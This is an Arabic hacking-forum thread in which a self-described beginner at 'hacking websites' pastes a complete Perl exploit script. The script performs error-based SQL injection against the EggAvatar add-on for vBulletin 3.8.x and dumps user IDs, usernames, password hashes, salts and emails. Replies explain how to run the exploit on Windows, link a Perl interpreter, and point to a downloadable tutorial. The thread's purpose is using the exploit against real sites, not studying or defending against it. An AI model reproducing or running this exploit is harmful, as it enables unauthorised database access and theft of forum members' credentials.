مشكلة في اختراق المواقع

مشكلة في اختراق المواقع


النتائج 1 إلى 5 من 5

الموضوع: مشكلة في اختراق المواقع

  1. #1

    Come مشكلة في اختراق المواقع

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاتة

    اخواني اعضاء جيوش الهكر

    اولا اسف على الغيبة بسبب الدراسة

    ثانيا نخش في الموضوع

    انا انتهيت بحمد الله من اختراق الاجهزة وبديت باختراق المواقع

    و وصلت لمرحلة ما فهمتها وهي لما ادخل لموقع الثغرات www.exploit-db.com

    واكتب اسم الثغرة وتطلعي افتح الثغرة

    مثال :-
    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــ



    #!/usr/bin/env perl
    use LWP::UserAgent;
    sub banner{
    print "###################################\n";
    print "############ DSecurity ############\n";
    print "###################################\n";
    print "# Email:dsecurity.vn[at]gmail.com #\n";
    print "###################################\n";
    }
    if(@ARGV<5){
    print "Usage: $0 address username password number_user sleeptime\n";
    print "Example: $0 http://localhost/vbb test test 10 10\n";
    exit();
    }
    $ua=LWP::UserAgent->new();
    $ua->agent("DSecurity");
    $ua->cookie_jar({});
    sub login(@){
    my $username=shift;
    my $password=shift;
    my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("vb_login_username=$username&vb_login_pas swor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login& vb_login_md5password=&vb_login_md5password_utf=");
    my $res = $ua->request($req);
    }
    sub v_request{
    #Declare
    $print = $_[0];
    $select = $_[1];
    $from = $_[2];
    $where = $_[3];
    $limit = $_[4];
    $sleep = $ARGV[4];
    if ($from eq '') {$from = 'information_schema.tables';}
    if ($where eq '') {$where = '1';}
    if ($limit eq '') {$limit = '0';}
    if ($sleep eq '') {$sleep = '10';}

    # Create a request
    my $req = HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar =1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");
    # Pass request to the user agent and get a response back
    my $res = $ua->request($req);
    #print $res->content;
    if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
    {$test = $3};
    sleep($sleep);
    return $print.$test."\n";
    }
    &banner;
    print "\n############################################### ################################################## ############\n";
    print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability #\n";
    print "# Date:06-03-2011 #\n";
    print "# Author: DSecurity #\n";
    print "# Software Link: http://www.vbteam.info/vb-3-8-x-addo...gg-avatar.html #\n";
    print "# Version: 2.3.2 #\n";
    print "# Tested on: vBulletin 3.8.0 #\n";
    print "################################################# ################################################## ##########\n";

    #login
    login($ARGV[1],$ARGV[2]);
    #Foot print
    print v_request('MySQL version: ','@@version');
    print v_request('Data dir: ','@@datadir');
    print v_request('User: ','user()');
    print v_request('Database: ','database()');
    #Get user
    for($i=1;$i<=$ARGV[3];$i++){
    print "-----------------------------------------\n";
    print $id = v_request('ID: ','userid','user','1',$i-1);
    if($id =~ /(ID\s(.*)/){
    print v_request('Group: ','usergroupid','user','userid='.$2);
    print v_request('Username: ','username','user','userid='.$2);
    print v_request('Password: ','password','user','userid='.$2);
    print v_request('Salt: ','salt','user','userid='.$2);
    print v_request('Email: ','email','user','userid='.$2);
    }

    }



    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــ

    يطلعلي كذا بس انا ما اعرف ايش اسوي فيها واذا اي واحد يعرف

    ارجو منه انه ما يبخل علينا

    وشكرا

  2. #2
    هكر متألق الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: مشكلة في اختراق المواقع

    هذه الثغرة مكتوبة بلغة perl
    تقوم بنسخ الكود كله وتحفضو في جهازك بصيغة pl
    وتشغلها من الدوس
    وتطبق الباقي
    بشرط عندك مترجم perl في جهازك

  3. #3

    افتراضي رد: مشكلة في اختراق المواقع

    والله انا جهازي مافيه مترجم وانا استخدم الوندوز لأني فهمت من كلامك انه بلغة perl وهذه لغة لينكس

    وشكرا لك على ردك

  4. #4
    هكر متألق الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: مشكلة في اختراق المواقع

    هذا الموقع الرسمي للمترجم على الوندوز حملو وثبتو
    http://www.activestate.com/activeperl

  5. #5

    افتراضي رد: مشكلة في اختراق المواقع

    أخي يلزملك اوزلا مترجم بيرل
    و تكون تعرف تترجم او تستغل الثغرات المكتوبة لغة البيرل حقيقة يلزملها درس
    وهاذا درس مفيد جدا :
    http://www.mediafire.com/?e4987b052weba46
    بالتوفيق...

المواضيع المتشابهه

  1. مشكلة في اختراق المواقع (بالصور)
    بواسطة aymen cyril kamar في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 7
    آخر مشاركة: 03-08-2013, 12:44 AM
  2. مشكلة + استفسار في اختراق المواقع
    بواسطة aymen cyril kamar في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 10
    آخر مشاركة: 03-07-2013, 11:58 PM
  3. مشكلة في اختراق المواقع
    بواسطة عبدالرحمن القميري في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 02-12-2013, 10:01 PM
  4. مشكلة في اختراق المواقع
    بواسطة aymen cyril kamar في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 12-06-2012, 09:38 PM
  5. مشكلة اختراق المواقع
    بواسطة crazy boy-999 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 6
    آخر مشاركة: 07-22-2012, 08:30 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •